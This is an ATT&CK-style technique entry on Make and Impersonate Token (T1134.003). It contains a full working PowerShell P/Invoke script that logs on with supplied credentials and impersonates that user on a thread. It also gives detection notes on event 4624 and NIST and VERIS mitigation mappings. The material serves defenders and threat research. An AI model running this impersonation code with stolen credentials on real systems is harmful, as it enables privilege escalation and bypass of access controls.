Adversaries may make new tokens and impersonate users to escalate privileges and bypass access controls. For example, if an adversary has a username and password but that user is not logged onto the system, the adversary can create a logon session for the user with the LogonUser function.(Citation: LogonUserW function) The function returns a handle to the new session's access token, and the adversary can then use SetThreadToken to assign that token to a thread, so the thread runs as the new user while the process identity is unchanged.
This behavior is distinct from Token Impersonation/Theft in that it creates a new user token rather than stealing or duplicating an existing one.
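The sequence described above, as an added example written in PowerShell with P/Invoke; it is not code from the ATT&CK page. One detail the description skips is that LogonUser returns a primary token while SetThreadToken only accepts an impersonation token, so the example duplicates the token with DuplicateTokenEx in between (ImpersonateLoggedOnUser does that conversion internally). The account, domain and password are placeholders, and the `TokenNative` class and `Invoke-MakeAndImpersonateToken` function are names chosen for this example.

```powershell
# Added example (not from the ATT&CK page): create a logon session with LogonUserW,
# duplicate the primary token into an impersonation token, and bind it to the
# calling thread with SetThreadToken. Credentials below are placeholders.

$nativeSource = @'
using System;
using System.Runtime.InteropServices;

public static class TokenNative
{
    public const int LOGON32_LOGON_INTERACTIVE     = 2;
    public const int LOGON32_LOGON_NEW_CREDENTIALS = 9;
    public const int LOGON32_PROVIDER_DEFAULT      = 0;
    public const int LOGON32_PROVIDER_WINNT50      = 3;
    public const int TOKEN_ALL_ACCESS              = 0x000F01FF;
    public const int SECURITY_IMPERSONATION        = 2;  // SECURITY_IMPERSONATION_LEVEL
    public const int TOKEN_IMPERSONATION           = 2;  // TOKEN_TYPE

    [DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
    public static extern bool LogonUserW(string user, string domain, string password,
                                         int logonType, int logonProvider, out IntPtr token);

    [DllImport("advapi32.dll", SetLastError = true)]
    public static extern bool DuplicateTokenEx(IntPtr existingToken, int desiredAccess,
                                               IntPtr tokenAttributes, int impersonationLevel,
                                               int tokenType, out IntPtr newToken);

    // First parameter is a PHANDLE; IntPtr.Zero means "the calling thread".
    [DllImport("advapi32.dll", SetLastError = true)]
    public static extern bool SetThreadToken(IntPtr thread, IntPtr token);

    [DllImport("advapi32.dll", SetLastError = true)]
    public static extern bool RevertToSelf();

    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern bool CloseHandle(IntPtr handle);
}
'@
Add-Type -TypeDefinition $nativeSource -ErrorAction Stop

function Get-LastWin32Message {
    $code = [Runtime.InteropServices.Marshal]::GetLastWin32Error()
    return "error {0}: {1}" -f $code, ([ComponentModel.Win32Exception]$code).Message
}

function Invoke-MakeAndImpersonateToken {
    param(
        [Parameter(Mandatory)] [string] $User,
        [Parameter(Mandatory)] [string] $Domain,
        [Parameter(Mandatory)] [string] $Password,
        [int] $LogonType = [TokenNative]::LOGON32_LOGON_INTERACTIVE,
        [int] $Provider  = [TokenNative]::LOGON32_PROVIDER_DEFAULT
    )

    $primary       = [IntPtr]::Zero
    $impersonation = [IntPtr]::Zero
    $before = [Security.Principal.WindowsIdentity]::GetCurrent().Name
    try {
        # 1. New logon session for the supplied credentials. With LOGON32_LOGON_INTERACTIVE
        #    the password is validated; the handle we get back is a primary token.
        if (-not [TokenNative]::LogonUserW($User, $Domain, $Password, $LogonType, $Provider, [ref]$primary)) {
            throw "LogonUserW failed ($(Get-LastWin32Message))"
        }

        # 2. SetThreadToken rejects primary tokens, so duplicate into an impersonation token.
        if (-not [TokenNative]::DuplicateTokenEx($primary, [TokenNative]::TOKEN_ALL_ACCESS, [IntPtr]::Zero,
                [TokenNative]::SECURITY_IMPERSONATION, [TokenNative]::TOKEN_IMPERSONATION, [ref]$impersonation)) {
            throw "DuplicateTokenEx failed ($(Get-LastWin32Message))"
        }

        # 3. Bind the token to the calling thread only; the process token is untouched.
        if (-not [TokenNative]::SetThreadToken([IntPtr]::Zero, $impersonation)) {
            throw "SetThreadToken failed ($(Get-LastWin32Message))"
        }

        # WindowsIdentity.GetCurrent() reports the thread token while impersonating.
        $during = [Security.Principal.WindowsIdentity]::GetCurrent().Name
    }
    finally {
        # 4. Always drop the thread token and close both handles, even on failure.
        [void][TokenNative]::RevertToSelf()
        foreach ($h in @($impersonation, $primary)) {
            if ($h -ne [IntPtr]::Zero) { [void][TokenNative]::CloseHandle($h) }
        }
    }

    [pscustomobject]@{
        Before = $before
        During = $during
        After  = [Security.Principal.WindowsIdentity]::GetCurrent().Name
    }
}

# Usage with placeholder credentials; During shows the new identity, Before and After the original:
# Invoke-MakeAndImpersonateToken -User 'svc_backup' -Domain 'CORP' -Password 'P@ssw0rd!'
```

Two practical points. First, the `LOGON32_LOGON_NEW_CREDENTIALS` variant (logon type 9, which requires `LOGON32_PROVIDER_WINNT50`) does not validate the password locally and leaves the local identity unchanged, so `Before` and `During` will show the same name; the supplied credentials are only used for outbound network authentication. Second, because LogonUser creates a real logon session, it is recorded as a Security event 4624 whose Logon Type matches the type passed in (2 here, 9 for the network variant) and whose Process Information fields name the calling process rather than the normal logon components, which is the first thing to hunt for when looking for this technique.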
NIST SP 800-53 control mappings:

Capability ID | Capability Description | Mapping Type | ATT&CK ID | ATT&CK Name | Notes |
---|---|---|---|---|---|
CM-06 | Configuration Settings | mitigates | T1134.003 | Make and Impersonate Token | |
CM-05 | Access Restrictions for Change | mitigates | T1134.003 | Make and Impersonate Token | |
IA-13 | Identity Providers and Authorization Servers | mitigates | T1134.003 | Make and Impersonate Token | |
IA-02 | Identification and Authentication (Organizational Users) | mitigates | T1134.003 | Make and Impersonate Token | |
AC-02 | Account Management | mitigates | T1134.003 | Make and Impersonate Token | |
AC-03 | Access Enforcement | mitigates | T1134.003 | Make and Impersonate Token | |
AC-05 | Separation of Duties | mitigates | T1134.003 | Make and Impersonate Token | |
AC-06 | Least Privilege | mitigates | T1134.003 | Make and Impersonate Token | |
VERIS mappings:

Capability ID | Capability Description | Mapping Type | ATT&CK ID | ATT&CK Name | Notes |
---|---|---|---|---|---|
action.hacking.variety.Use of stolen creds | Use of stolen or default authentication credentials (including credential stuffing) | related-to | T1134.003 | Make and Impersonate Token | |